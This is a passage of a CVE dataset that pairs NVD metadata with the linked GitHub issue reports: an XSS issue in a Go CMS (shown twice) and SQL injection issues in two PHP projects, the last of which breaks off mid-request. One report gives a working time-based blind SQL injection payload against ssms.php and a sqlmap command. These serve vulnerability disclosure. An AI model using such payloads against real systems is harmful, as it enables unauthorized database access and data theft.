(CWE-22) might yield the full pathname of the installed application. In turn, this could be used to select the proper number of ".." sequences to navigate to the targeted file. An attack using SQL injection (CWE-89) might not initially succeed, but an error message could reveal the malformed query, which would expose query logic and possibly even passwords or other sensitive information used within the query.
Generation of Error Message Containing Sensitive Information in roll_cms/roll_cms/views.py
https://api.github.com/repos/erjemin/roll_cms/issues/1/comments
0
2024-08-31T13:41:06Z
2024-08-31T13:41:06Z
https://github.com/erjemin/roll_cms/issues/1
2,498,851,543
1
6,267
CVE-2024-8572
2024-09-08T08:15:13.443
A vulnerability was found in Gouniverse GoLang CMS 1.4.0. It has been declared as problematic. This vulnerability affects the function PageRenderHtmlByAlias of the file FrontendHandler.go. The manipulation of the argument alias leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.4.1 is able to address this issue. The patch is identified as 3e661cdfb4beeb9fe2ad507cdb8104c0b17d072c. It is recommended to upgrade the affected component.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/gouniverse/cms/commit/3e661cdfb4beeb9fe2ad507cdb8104c0b17d072c" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/gouniverse/cms/issues/5" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/gouniverse/cms/issues/5#issuecomment-2330848731" }, { "source": "cna@vuldb.com", "tags": [ "Release Notes" ], "url": "https://github.com/gouniverse/cms/releases/tag/v1.4.1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.276802" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.276802" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.401896" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gouniverse:golang_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "C9A55696-4C86-4339-A3D2-59DF1590653A", "versionEndExcluding": "1.4.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/gouniverse/cms/issues/5
[ "Issue Tracking" ]
github.com
[ "gouniverse", "cms" ]
Cause of vulnerability: A potential Cross-site scripting (XSS) vulnerability exists on line 19 of the FrontendHandler.go file in the code. The vulnerability is caused by user-supplied values being inserted directly into the generated HTML page without proper processing or escaping. Specifically, the 'PageRenderHtmlByAlias' function takes an alias parameter and inserts it directly into the returned HTML string. If an attacker is able to control this alias parameter and inject malicious scripts, these scripts will be executed in the user's browser, resulting in a cross-site scripting attack. This situation is very dangerous because it allows an attacker to execute arbitrary code or steal user information. FrontendHandler.go line 33-52 ``` func (cms *Cms) FrontendHandlerRenderAsString(w http.ResponseWriter, r *http.Request) string { uri := r.RequestURI if strings.HasSuffix(uri, ".ico") { return "" } languageAny := r.Context().Value(LanguageKey{}) language := utils.ToString(languageAny) if cms.translationsEnabled { isValidLanguage := lo.Contains(lo.Keys(cms.translationLanguages), language) if !isValidLanguage { language = cms.translationLanguageDefault } } return cms.PageRenderHtmlByAlias(r, r.URL.Path, language) } ``` PageBuildHtml.go line 10-22 ``` // PageRenderHtmlByAlias builds the HTML of a page based on its alias func (cms *Cms) PageRenderHtmlByAlias(r *http.Request, alias string, language string) string { page, err := cms.PageFindByAlias(alias) if err != nil { cms.LogStore.ErrorWithContext("At pageBuldHTMLByAlias", err.Error()) return "Page with alias '" + alias + "' not found" } if page == nil { return "Page with alias '" + alias + "' not found" } pageAttrs, err := page.GetAttributes() if err != nil { return "Page '" + alias + "' io exception" } ```
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in FrontendHandler.go
https://api.github.com/repos/gouniverse/cms/issues/5/comments
1
2024-09-03T15:08:24Z
2024-09-05T07:52:18Z
https://github.com/gouniverse/cms/issues/5
2,503,131,319
5
6,268
CVE-2024-8572
2024-09-08T08:15:13.443
A vulnerability was found in Gouniverse GoLang CMS 1.4.0. It has been declared as problematic. This vulnerability affects the function PageRenderHtmlByAlias of the file FrontendHandler.go. The manipulation of the argument alias leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.4.1 is able to address this issue. The patch is identified as 3e661cdfb4beeb9fe2ad507cdb8104c0b17d072c. It is recommended to upgrade the affected component.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/gouniverse/cms/commit/3e661cdfb4beeb9fe2ad507cdb8104c0b17d072c" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/gouniverse/cms/issues/5" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/gouniverse/cms/issues/5#issuecomment-2330848731" }, { "source": "cna@vuldb.com", "tags": [ "Release Notes" ], "url": "https://github.com/gouniverse/cms/releases/tag/v1.4.1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.276802" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.276802" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.401896" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gouniverse:golang_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "C9A55696-4C86-4339-A3D2-59DF1590653A", "versionEndExcluding": "1.4.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/gouniverse/cms/issues/5#issuecomment-2330848731
[ "Issue Tracking" ]
github.com
[ "gouniverse", "cms" ]
Cause of vulnerability: A potential Cross-site scripting (XSS) vulnerability exists on line 19 of the FrontendHandler.go file in the code. The vulnerability is caused by user-supplied values being inserted directly into the generated HTML page without proper processing or escaping. Specifically, the 'PageRenderHtmlByAlias' function takes an alias parameter and inserts it directly into the returned HTML string. If an attacker is able to control this alias parameter and inject malicious scripts, these scripts will be executed in the user's browser, resulting in a cross-site scripting attack. This situation is very dangerous because it allows an attacker to execute arbitrary code or steal user information. FrontendHandler.go line 33-52 ``` func (cms *Cms) FrontendHandlerRenderAsString(w http.ResponseWriter, r *http.Request) string { uri := r.RequestURI if strings.HasSuffix(uri, ".ico") { return "" } languageAny := r.Context().Value(LanguageKey{}) language := utils.ToString(languageAny) if cms.translationsEnabled { isValidLanguage := lo.Contains(lo.Keys(cms.translationLanguages), language) if !isValidLanguage { language = cms.translationLanguageDefault } } return cms.PageRenderHtmlByAlias(r, r.URL.Path, language) } ``` PageBuildHtml.go line 10-22 ``` // PageRenderHtmlByAlias builds the HTML of a page based on its alias func (cms *Cms) PageRenderHtmlByAlias(r *http.Request, alias string, language string) string { page, err := cms.PageFindByAlias(alias) if err != nil { cms.LogStore.ErrorWithContext("At pageBuldHTMLByAlias", err.Error()) return "Page with alias '" + alias + "' not found" } if page == nil { return "Page with alias '" + alias + "' not found" } pageAttrs, err := page.GetAttributes() if err != nil { return "Page '" + alias + "' io exception" } ```
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in FrontendHandler.go
https://api.github.com/repos/gouniverse/cms/issues/5/comments
1
2024-09-03T15:08:24Z
2024-09-05T07:52:18Z
https://github.com/gouniverse/cms/issues/5
2,503,131,319
5
6,269
CVE-2024-8611
2024-09-09T21:15:13.377
A vulnerability classified as critical was found in itsourcecode Tailoring Management System 1.0. Affected by this vulnerability is an unknown functionality of the file ssms.php. The manipulation of the argument customer leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/elegant228/cve/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://itsourcecode.com/" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.276841" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?id.276841" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.404875" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:angeljudesuarez:tailoring_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "D6D27827-5554-4FAB-8460-52599930F4FF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/elegant228/cve/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "elegant228", "cve" ]
# Itsourcecode Tailoring Management System Project In PHP With Source Code v1.0 ssms.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Tailoring Management System Project In PHP With Source Code ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/tailoring-management-system-project-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + elegant229 ## Vulnerable File + ssms.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2021/04/tailoring-management-system-project-in-php-with-source-code.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'ssms.php' file of the 'Tailoring Management System Project In PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "customer" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="780" alt="1" src="https://github.com/user-attachments/assets/aa1dc62f-8b69-44b3-bb40-fb8de6b6f2c5"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input validation for the "customer" parameter, a serious SQL injection vulnerability has been discovered in the "Tailoring Management System Project in PHP With Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # Vulnerability details and POC ``` POST /ssms.php HTTP/1.1 Host: 192.168.1.138:2223 Content-Length: 66 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.138:2223 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.138:2223/ssms.php Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: __utma=123545163.603012537.1718449838.1718449838.1718449838.1; __utmz=123545163.1718449838.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=umavm58j5beqmmme0aof5v26v4 Connection: close customer=123123&phone=%2B2347XXXXX12XXXX&template=0&message=213213 ``` ## Vulnerability type: + time-based blind ## Vulnerability location: + 'customer' parameter ## Payload: ``` Parameter: customer (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: customer=123123' AND (SELECT 3872 FROM (SELECT(SLEEP(5)))RrWQ) AND 'UBjF'='UBjF&phone=+2347XXXXX12XXXX&template=0&message=213213 ``` <img width="360" alt="2" src="https://github.com/user-attachments/assets/8bc031e5-1234-4866-8562-b3f61c268faa"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -r 123 --batch --dbs ``` <img width="330" alt="3" src="https://github.com/user-attachments/assets/04066941-4ded-402f-8f3f-a9ed4f8b4218"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Tailoring Management System Project In PHP With Source Code v1.0 ssms.php SQL injection
https://api.github.com/repos/elegant228/cve/issues/1/comments
0
2024-09-09T11:55:12Z
2024-09-09T11:55:12Z
https://github.com/elegant228/cve/issues/1
2,513,753,664
1
6,270
CVE-2024-8762
2024-09-13T01:15:02.320
A vulnerability was found in code-projects Crud Operation System 1.0. It has been classified as critical. This affects an unknown part of the file /updatedata.php. The manipulation of the argument sid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://code-projects.org/" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Kangsiyuan/1/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.277341" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.277341" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.406159" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:code-projects:crud_operation_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "D15BB350-68BE-4E74-B9CE-BC9120B6F230", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/Kangsiyuan/1/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Kangsiyuan", "1" ]
# code-projects.org"Crud Operation System" in PHP 1.0 "updatedata.php" SQL injection # NAME OF AFFECTED PRODUCT(S) + Pharmacy/Medical Store Point of Sale System Using PHP/MySQL and Bootstrap Framework with Source Code ## Vendor Homepage + https://code-projects.org/crud-operation-system-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + xxxx ## Vulnerable File + updatedata.php ## VERSION(S) + V1.0 ## Software Link + https://download.code-projects.org/details/731e738a-548f-4e50-adb7-0ac0a36236d3 # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'updatedata.php' file of the 'Crud Operation System' project. The reason for this issue is that attackers inject malicious code from the parameter "sid" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the PHP "Crud Operation System", "xxx" discovered a critical SQL injection vulnerability in the "login.php" file. This vulnerability stems from insufficient user input validation of the "sid" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC --- POST /updatedata.php HTTP/1.1 Host: 192.168.1.116:125 Content-Length: 87 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.116:125 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 